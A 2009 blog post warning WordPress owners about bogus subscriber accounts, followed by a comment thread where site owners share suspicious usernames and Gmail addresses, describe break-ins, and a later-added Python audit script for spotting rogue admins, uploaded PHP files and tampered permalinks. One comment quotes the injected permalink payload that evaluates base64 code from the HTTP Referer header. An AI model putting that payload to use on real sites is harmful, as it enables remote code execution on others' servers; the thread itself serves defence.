An Open Note to WordPress Spammers & Hackers
Dear WordPress Spammers and Hackers,
You made a very STUPID mistake these past few days which allowed me to catch on to what you were doing!
First, you registered as a user on my roomie’s blog. That in and of itself wouldn’t have been something suspicious, except for the fact that he does not have the conventional registration link as I do on my blog! He purposely disabled it.
So, in order for you to have been able to register yourself, you would have had to go through the backdoor, which only a technical user of WordPress would know, or a hacker! Nice one!
But you were busted because the roomie gets e-mailed automatically when someone registers, and you didn’t register through the normal link on his site, which was what made him suspicious and brought it to my attention.
That being said, you also made another stupid mistake.
You registered under the same name and same e-mail address for my blog and a number of my clients’ blogs, for which I also get e-mails when someone subscribes, under the webmaster account for all my clients.
Imagine my surprise when I saw a MikeB***** being so interested in all our blogs and with probably a bogus Gmail address too! Such a diverse amount of interests you have my dear!
I am in the process of verifying the MikeB***** Gmail address and as of this writing, I’ve not received a return notice from Gmail that the user does not exist. However, I also haven’t received an email from the person to verify their first name as a legitimate user either! (Which is why I have not yet published the full name!)
WordPress users, if you have seen the Gmail address Pulvillarrac@gmail.com in your subscribers, you may want to disable or ban the account. This is the person who registered on my roomie’s blog through the back door.
@henninguhle on Twitter stated that this email address is a hacker! I am also in the process of getting his permission to publish his German blog post about this here in English.
Yes, I know, you didn’t know I was so talented! {{{BLUSH}}} The problem is, I also forgot about the time difference between the US and Germany! My bad!
Also, a word to the wise for all you WordPress users out there. Bill Mitchell and I discussed this twice in the BlogTalk radio shows, but you may have not had time to listen to them so here’s a “HEADS UP”.
If you are using a default login of “admin” as a user name in your blog, log in and set up a new administrator account under a different name. Anything but admin, ADMIN, Admin, Administrator, or anything resembling an admin account!
Make sure you create a password that does not include a word in the dictionary, and use a combination of upper and lowercase letters along with a number or 2 or 3 and an odd character like the $ sign or something. The longer the better.
Log out of your admin account and log in to your new admin account. Then, switch the default admin account to a subscriber. And if you have an easy password for that account, change it! And don’t use the one you are using for your new admin account under the new name. Make it different.
Consider yourself duly warned!

I am going to look for that email on my blogs and subscribers, I don’t allow anyone to create accounts, can they still bypass this and create an account?
Reply
Debbie Mahler reply on September 1st, 2009 6:18 pm:
Yes, they can. They are using two methods. Either they are going to the typical Admin link that is custom in WP set ups, or they are entering a specific chain of instructions for PHP to get there. But the same login link that you have to sign in to your WP blog, is the same for everyone. And if you look under the login block, the link to register is there. So, even though you may have it disabled, they can still get to it!
Reply
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
they hit my blog too.. look for both of these
Reply
Debbie Mahler reply on September 2nd, 2009 12:41 pm:
Thanks Beff! I appreciate all the info I can get to share this with others!
Debbie
Reply
here are three i’ve gotten recently on my blog:
Username: arnoldisby
E-mail: naomyrotenford@gmail.com
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Reply
Debbie Mahler reply on September 2nd, 2009 12:40 pm:
Chaz, Thank you! I didn’t know about Arnoldisby!
Mike Wink was the one I mentioned in the article but until I confirmed, I wasn’t going to accuse. But you are the 2nd person to post that and the Gmail address used, so it must be a spammer. I tried to verify the Gmail address, but apparently Gmail does not send back a response with “User not found” or anything. That’s probably why these idiots use Gmail! But that’s a subject for yet another post! (Laughing)
Thanks for responding, and I hope you visit again soon!
Debbie
Reply
Thank you! This Pulvillarrac@gmail.com subbed to my blog too. I googled it and found your page here.
I found it weird because I had like 2 subscribers in a week, and I never get any subscribers.
Thank you!
Reply
Debbie Mahler reply on September 2nd, 2009 12:38 pm:
My roomie will be doing a guest blog post soon about this whole issue. He has one blog that has nothing but “Hello World” posted and the comments he gets about that is freaking hilarious! So he’s getting to be an expert on spammers!
Thanks for posting Rob and sharing! I hope you will be a regular visitor!
Debbie
Reply
Hi Debbie,
I caught at least two more and while I did not activate their accounts and they are still subscribers, one day after their intruding the very WordPress installations had been spammed with hundreds of comments from gmail addresses (thanks to Akismet!).
The attackers are:
Andrianq pulvillarrac@gmail.com
MikeWink bugbeemershonyhe@gmail.com
Miriam obierebelominepyb@gmail.com
Kind regards from Austria
Reply
Debbie Mahler reply on September 2nd, 2009 12:36 pm:
MikeWink was the name I didn’t include because I wanted to verify the e-mail address was bogus before I published it. It appears that Gmail does not respond with a “No User” notice so I could not confirm it. Thanks for sharing that because now I know he’s bogus too. And I didn’t know about Miriam!
Yes, I love Akismet and Bad Behavior! Saved my assets several times between the two!
Thank you so much for commenting and sharing!
Debbie
Reply
[...] I will promote the advice by another savvy and alert Wordpresser who caught one of the same addresses registering at his site. Don’t use the default admin user [...]
Just found your site through the same search for new registrants to my site. I put up a similar warning post to track back here. We should try to get as complete a list together of the names being used.
Reply
Debbie Mahler reply on September 3rd, 2009 1:33 pm:
David, you’ll notice I added myself as a user to your site too, and commented! Thank you so much. I agree, the entire WP community needs to share this info! Thank you again! Debbie
Reply
Thanks for the post. I just recently started receiving these as well. I will make a post on my site to notify other users. Here are the Username/Email I have had so far:
Username: rafaellabove
E-mail: jonatanwebsterbaum@gmail.com
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Username: Miriam
E-mail: obierebelominepyb@gmail.com
Reply
Debbie Mahler reply on September 3rd, 2009 1:33 pm:
Jason, Thanks! rafaellabove is a new one I’ve not seen! Debbie
Reply
[...] My apologies if you have received any strange messages pretending to be from this site. A spammer hacked in and registered as a user. This is part of an ongoing problem throughout Europe. See these sites to see what’s been going on: Technical Tidbits. [...]
Rob,
I felt the same way. I’ve had my blog up for 2 years, and have never gotten a subscriber. But in the span of three days I got a total of three subscribers (one each day). I didn’t know what to think at first, except that my gut told me something was fishy. My wife suggested googling the email addresses, and that’s what landed me here. I deleted those three users and changed my password the very minute I finished reading the post.
Kind of scary.
Reply
I also received subscriber notifications this week for Andrianq – pulvillarrac@gmail.com and
MikeWink – bugbeemershonyhe@gmail.com
I googled and found both listed as spammers/hackers and promptly deleted their accounts. I have my blog set up to notify me of comments and subscriptions. No one is allowed to sign up in any other capacity. So far so good.
Thanks for posting this info!
Reply
Thank you so much for this timely post! ALL of the above addresses were listed as subscribers on my blog. What made me suspicious was also 3 new subscribers overnight, all with weird names and no comments / pingbacks.
This post was so helpful. I have changed my admin settings and am relieved to have solved the mystery so quickly and easily.
Have an awesome day!
Reply
Debbie Mahler reply on September 3rd, 2009 1:34 pm:
Lauren, Thank you for taking the time to comment! I appreciate it! Do check back with us again! Debbie
Reply
Ever since we started allowing people to register on our blog we’ve been receiving notifications of new users who have a distinct spammy look to them.
Up until now we haven’t deleted any of them so they are all still listed as subscribers. I haven’t seen any damage due to having them subscribe, but after coming across your post I’m wondering if I’m being too lax.
Can they possibly hack their way into areas they have no business accessing just because I’ve allowed them to subscribe?
Thanks for any insight you can share with me.
Reply
Debbie Mahler reply on September 3rd, 2009 1:37 pm:
At this present time Marilyn, No. But that doesn’t stop them from trying. The good thing is that the WP community keeps the security issues patched regularly, so just make sure you are always using the current version, AND, that you change the default ADMIN account as recommended. Debbie
Reply
Thom Harvick reply on September 4th, 2009 4:52 pm:
they changed my urls to add this on the end
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
so they can damage your s.e. position
Reply
Wow, thank you very much for the quick response. I will definitely take your recommendation to change the Admin username and I guess I’ll just keep a very close eye on things for the time being.
If I notice anything fishy I will definitely pass it along.
Thank you.
Reply
I found your site because… wait for it, wait for it… Yup, Adrianq got me too. I checked my log, and found my URLs had been changed just moments before I was on. The e-mail Pulvillarrac@gmail.com is what was used. My site http://corporateabuse.net should not see any horrible effects since I caught it fairly soon. I hope you can make something happen with the info you have. If not, Karma will get them.
Reply
I too came here via a Google search once I saw that I had “acquired” 3 subscribers, and like so many of the others that have posted here, I’ve never had subscribers before.
So now, no one is allowed to subscribe without emailing me first, and I’ve changed the default admin account as suggested.
Many thanks Debbie. Who knows how many people this post will help and protect.
Bright Blessings to you.
Ross – Tolemac
Reply
username:caseyizarraras
email:jonatanwebsterbaum@gmail.com
Found it this morning, 9/5/2009.
Reply
Yes, I had Mike Wink bugbeemershonyhe@gmail.com as a user on two accounts that he shouldn’t have been. I’m checking others.
Reply
For three days between 8/31/09 to 9/2/09, I got one new subscriber each day for a blog I haven’t updated in almost a year.
Username: Andrianq
E-mail: pulvillarrac@gmail.com
Username: adriankellom
E-mail: jonatanwebsterbaum@gmail.com
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Reply
Confirming the following:
Username: MikeWink
E-mail: bugbeemershonyhe@gmail.com
Signed up as subscriber on one of my WP blogs.
The next day, there was a new user GayleRodger64 with no email address for just one day. This was followed by RogerRizo63, also with no email address but with admin privileges. That was when the js script was injected into the db and my permalinks started failing. (I have incremental backups of my database.)
Reply
Hey good stuff…keep up the good work! I read a lot of blogs on a daily basis and for the most part, people lack substance but, I just wanted to make a quick comment to say I’m glad I found your blog. Thanks,)
A definite great read…:)
-Bill-Bartmann
Reply
Thank you so much for letting me know this, especially about Username: Andrianq
E-mail: pulvillarrac@gmail.com
I noticed a bunch of minor irregularities on my blog. I have now shut down all subscribers- I make my money from people that find my site from the search engine anyway.
I have now bookmarked your site and will try to give it a plug in an applicable Blog. Thanks Again. You are the Man!
Reply
Hey, firstly thanks for posting this. Helped me narrow down a few suspicious “subscribers”.
I was perusing my uploads folder via FTP and noticed in my 2009/02/ directory there was a PHP file there that I did not put there. The file was “963991.php” (filled with some base64 gibberish), so immediately I knew something was up. I updated my WP to the current version and then logged into phpMyAdmin to check out my DB user tables, and sure enough there was a user with no email or any other credentials in there that did not show up in the WP dashboard. So they are able to cause mass damage if they can upload a PHP file and add admin users.
I would definitely recommend to anyone with these “subscribers” to check your user tables and your upload directories (specifically September’s), then remove anything unauthorized.
Reply
O'Ryan reply on October 13th, 2009 2:49 pm:
Oops, I meant I found the PHP file in my 2009/09 directory. My mind has too many numbers floating around right now. lol
Reply
Debbie Mahler reply on October 23rd, 2009 10:07 am:
Thanks for all that information! And I’m so happy you found the file and the database entry! Great advice. I appreciate you commenting and letting everyone know how to check for this.
Reply
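The checks recommended in the post and in the comment thread above (no default-style administrator login, no accounts without an e-mail address or with unexpected admin rights, no PHP files in the uploads folder, no code in the permalink structure) can be run together over exported data. This is an added example, not code from the original post or its commenters; the function names, the row format and the sample rows are assumptions made for illustration.

```python
import os
import re

# Logins the post advises against for an administrator account.
ADMIN_LIKE = re.compile(r"^(admin|administrator)\d*$", re.IGNORECASE)
# Code markers seen in the tampered permalink string quoted in the comments.
INJECTION = re.compile(r"eval\s*\(|base64_decode|\$_SERVER", re.IGNORECASE)


def audit_users(users, known_admins):
    """users: dicts with login, email, role (e.g. rows exported from the user table)."""
    findings = []
    for u in users:
        login, role = u["login"], u["role"]
        email = (u.get("email") or "").strip()
        if not email:
            findings.append((login, "no e-mail address"))
        if role == "administrator" and login not in known_admins:
            findings.append((login, "unexpected administrator"))
        if role == "administrator" and ADMIN_LIKE.match(login):
            findings.append((login, "default-style admin login"))
    return findings


def php_in_uploads(uploads_dir):
    """Return relative paths of PHP-like files under the uploads directory."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if re.search(r"\.(php\d?|phtml)$", name, re.IGNORECASE):
                hits.append(os.path.relpath(os.path.join(root, name), uploads_dir))
    return sorted(hits)


def permalink_is_tampered(structure):
    """True if the permalink structure setting contains PHP code markers."""
    return bool(INJECTION.search(structure))


# Constructed sample rows (hypothetical, not taken from any real site).
SAMPLE_USERS = [
    {"login": "admin", "email": "owner@example.com", "role": "administrator"},
    {"login": "editor_jane", "email": "jane@example.com", "role": "administrator"},
    {"login": "newuser63", "email": "", "role": "administrator"},
    {"login": "reader1", "email": "reader@example.com", "role": "subscriber"},
]

if __name__ == "__main__":
    for login, reason in audit_users(SAMPLE_USERS, {"admin", "editor_jane"}):
        print(f"{login}: {reason}")
```

Because one commenter found an account that did not show up in the WP dashboard, the user rows should come from the database itself rather than from the dashboard's user list.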
[...] you’ve been following our blog tracking the WordPress suspicious subscribers starting with, An Open Note to WordPress Spammers & Hackers, and then, Adding to the WP Hacking Post, you’ll know many people are listing suspicious [...]
Thank you for this. I’ve started a list of my own having found several “hacker” email addresses and registrations on our web site. We have disabled registration for the moment in the hope of combating them.
Reply
Hi!
You can add this email “makilovitalcamader@gmail.com” to your hacker list!
My WordPress has been subscribed to and (I guess) hacked!
I can’t manage to log in to my usual FTP account to alter my website!
Any help please!
Reply
Debbie Mahler reply on February 9th, 2010 12:04 pm:
Michael, If you cannot login to your FTP, you need to start your process by contacting your web host company. Explain what happened and get them to reset your account. That’s where you start.
Reply